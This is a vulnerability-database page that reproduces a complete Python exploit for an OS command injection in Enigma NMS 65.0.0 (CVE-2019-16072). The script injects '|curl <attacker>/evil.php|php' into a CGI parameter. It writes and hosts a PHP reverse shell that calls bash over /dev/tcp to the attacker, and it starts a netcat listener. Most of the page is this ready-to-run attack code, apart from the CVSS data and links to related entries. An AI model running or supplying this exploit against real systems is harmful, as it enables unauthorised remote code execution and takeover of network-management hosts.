Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Enigma NMS 65.0.0 - OS Command Injection

🗓️ 09 Sep 2019 00:00:00Reported by xerubusType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 331 Views

Enigma NMS 65.0.0 OS Command Injection against NETSAS Pty Ltd. Reverse shell created with PHP and hosted via a simple web server.

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Enigma NMS 65.0.0 - OS Command Injection Exploit
9 Sep 201900:00
zdt
Circl		CVE-2019-16072
19 Oct 202523:53
circl
Check Point Advisories		Netsas Enigma Network Management Solution Remote Code Execution (CVE-2019-16072)
10 Sep 202000:00
checkpoint_advisories
CVE		CVE-2019-16072
19 Mar 202023:06
cve
Cvelist		CVE-2019-16072
19 Mar 202023:06
cvelist
exploitpack		Enigma NMS 65.0.0 - OS Command Injection
9 Sep 201900:00
exploitpack
Nuclei		Enigma NMS < 65.0.0 - Authenticated OS Command Injection
23 Jun 202605:08
nuclei
NVD		CVE-2019-16072
20 Mar 202000:17
nvd
Packet Storm		Enigma NMS 65.0.0 OS Command Injection
9 Sep 201900:00
packetstorm
Prion		Command injection
20 Mar 202000:17
prion
Rows per page
#!/usr/bin/python
#--------------------------------------------------------------------#
# Exploit Title: Enigma NMS OS Command Injection                     #
# NETSAS Pty Ltd Enigma NMS                                          #
# Date:  21 July 2019                                                #
# Author: Mark Cross (@xerubus | mogozobo.com)                       #
# Vendor: NETSAS Pty Ltd                                             #
# Vendor Homepage:  https://www.netsas.com.au/                       #
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/  #
# Version: Enigma NMS 65.0.0                                         #
# CVE-IDs: CVE-2019-16072                                            #
# Full write-up: https://www.mogozobo.com/?p=3647                    #
#--------------------------------------------------------------------#

import sys, time, os, subprocess, signal, requests, socket, SocketServer, SimpleHTTPServer, threading

os.system('clear')

print("""\
        _  _
  ___ (~ )( ~)
 /   \_\ \/ /   
|   D_ ]\ \/  -= Enigma NMS Reverse Shell by @xerubus =-    
|   D _]/\ \     -= We all have something to hide =-
 \___/ / /\ \\
      (_ )( _)
      @Xerubus    
                    """)

enigma_host = raw_input("Enter Enigma NMS IP address:\t")
attack_host = raw_input("Enter Attacker IP address:\t")
rev_sh_port = raw_input("Enter reverse shell port:\t")
web_svr_port = raw_input("Enter web server port:\t\t")
user = raw_input("Enter Username:\t\t\t")
os.system("stty -echo")
password = raw_input("Enter Password (no echo):\t")
os.system("stty echo")
	
enigma_url = "http://" + enigma_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|curl%20" + attack_host + ":" + web_svr_port + "/evil.php|php&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1"
enigma_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://" + attack_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser", "Connection": "close", "Upgrade-Insecure-Requests": "1"}

print "\n\n[+] Building PHP reverse shell"
f=open("evil.php","w")
f.write("<?php\nexec(\"/bin/bash -c \'bash -i >& /dev/tcp/" + attack_host + "/" + rev_sh_port + " 0>&1\'\");\n?>\n")
f.close()

# Create simple webserver hosting evil php file
print "[+] Hosting PHP reverse shell"
web_svr_port = str(web_svr_port)
web_svr = subprocess.Popen(["python", "-m", "SimpleHTTPServer", web_svr_port], stdout=subprocess.PIPE, shell=False, preexec_fn=os.setsid)

# Create netcat listener
print "[+] Creating listener on port " + rev_sh_port
subprocess.Popen(["nc", "-nvlp", rev_sh_port])

# Send payload to Enigma NMS
print "[+] Sending payload\n"
try:
    r = requests.get(enigma_url, headers=enigma_headers, auth=(user, password))
except:
    pass

print "\n[+] Cleaning up mess..." 

# Shut down http server
os.killpg(os.getpgid(web_svr.pid), signal.SIGTERM)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 Sep 2019 00:00Current
9.8High risk
Vulners AI Score9.8
CVSS 3.19.8
CVSS 210
EPSS0.25279
enigma nmscommand injectionnetsas pty ltdreverse shellphpweb servercve-2019-16072remote code execution
331